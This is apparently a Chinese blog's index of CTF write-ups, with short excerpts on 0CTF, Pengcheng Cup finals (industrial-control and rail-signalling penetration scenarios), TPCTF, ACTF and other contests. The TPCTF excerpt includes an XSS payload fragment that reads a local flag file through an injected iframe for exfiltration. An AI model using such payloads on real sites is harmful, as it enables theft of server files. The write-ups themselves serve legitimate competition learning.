分类: CTF write up

54 篇文章

3rm1 tctf/0ctf wp
3rm1 tctf/0ctf wp 代码审计 有客户端(flag)和服务端 jdk8u201 (!=jdk8u121,无JEP290限制;jdk>191, 若jndi注入需要考虑高版本) 客户端 非spring javawebmvc,核心代码 try { LocateRegistry.getRegistry("rmiserver&q…
鹏城杯2023wp-决赛-深圳-day3
2023-鹏城杯决赛wp-day3 最终成绩 石油石化自动控制安全2 该场景是模拟天然气采集、输送和净化的生产工艺流程,主要生产设备包括采气井、测量仪表、管道、锅炉、脱硫装置、脱水装置。靶标设备为工程师站实物和生产控制系统(PAC)实物。选手对需现场控制逻辑进行篡改,实现危险操作。选手需要提交报告说明整个过程。该场景需要完成石油石化自动控制安全1后…
鹏城杯2023wp-决赛-深圳-day2
鹏城杯2023wp-决赛-深圳-day2 轨道交通列控场景(1000分拿满) 渗透测试 1000 描述: 该场景模拟了监测网络和生产网络为两个网络,攻击者需通过监测系统网络向列车运行控制系统网络渗透的场景。 要求选手首先攻陷联锁设备(地址:192.168.11.103),以联锁设备为跳板进一步渗透生产网区域;选手需要攻陷调度服务器,通过调度软件为列…
鹏城杯2023wp-决赛-深圳-day1
鹏城杯2023wp-决赛-深圳-day1 手册 大家有些选手不及时 出席的 ,第一次进入鹏城实验室 没有腕带 就报来由,还是不行 就大打 选手手册 中 留的 紧急联系电话:18529592717(李老师) 大家注意哈,明天比赛 请从 上图中的 鹏城实验室 东门进入,门卫统一在 东门 审核身份,提问来由请回复“参加鹏城杯决赛,已报备”。感谢您的配合!…
xctf-TPCTF wp
xctf-TPCTF wp 还得是xctf,现在xctf的web题都没web界面了屌 XSSBOT 想法很简单,直接读文件然后外带 <img src="xasdasdasd" onerror="document.write('<iframe src=file:///flag></ifr…
2023强网拟态线上预选赛wp
2023强网拟态线上预选赛wp 不说了放图,前12晋级,不知道怎么顺延到咱第20的 还真是,好怪哦,再看一眼! oumisotuitennnoka 非预期做法,感谢@micgo,学弟越来越屌了 <?php highlight_file(__FILE__); $dir = '/tmp'; $htContent = <&…
鹏城杯2023线上赛wp
鹏城杯2023wp 介绍 一年一度的在深圳鹏城实验室的暑假到秋季举办的线下比赛,去年比赛以渗透赛为主,有非常趣味的体验,今年则增加了很多工控,实车,5G的场景 这个是线上比赛Aurora的wp,最终线上比赛的成绩,【aurora】和【大家好我是超威蓝猫】都晋级了,可以领到每人1k的低保,好开心! web-web1 H::desturct->H…
xctf-actf-wp
xctf-actf-wp 前言 最终成绩是21名 第一天面试去了,早上和晚上抽空看了下做出了craftcms (非预期解法,因为预期解法打不通) 第二天白天睡了一天(连续一个星期8点钟起床高强度面试,顶不住了),凌晨2点打到7点出了Ave Mujica's Masquerade,然后倒头就睡到深夜 边面试边比赛真的很难顶,好在这次题目质量非常不错!…
羊城杯2023 wp
羊城杯2023 wp 前言 周末抽空陪学弟打了一下,深感web的无力。全程基本都是我、学长和正汰在做。。。 micgo已经润实战了,令人感慨。 但令人感到高兴的是, 这次比赛难度很适合我,太棒了,学到很多! 最后的战况是,差一道猜谜黑盒题就ak了 ez_java 法一 法一的灵感是jackson原生反序列化 BadAttributeValueExp…
HITB_seccon_awd wp
HITB_seccon_awd wp 前言 有幸参加了,比较新颖的是这次的规则,在规则中,flag全部是通过逻辑漏洞或者其他的非rce手段越权到目标用户拿到的,这样有效的避免了一些权限维持,提权的恶俗操作 由于主办方提供了含有flag的目标用户的用户名(比赛中称为flag_id),所以后面默认我们都已知目标用户的用户名 passmgr go web…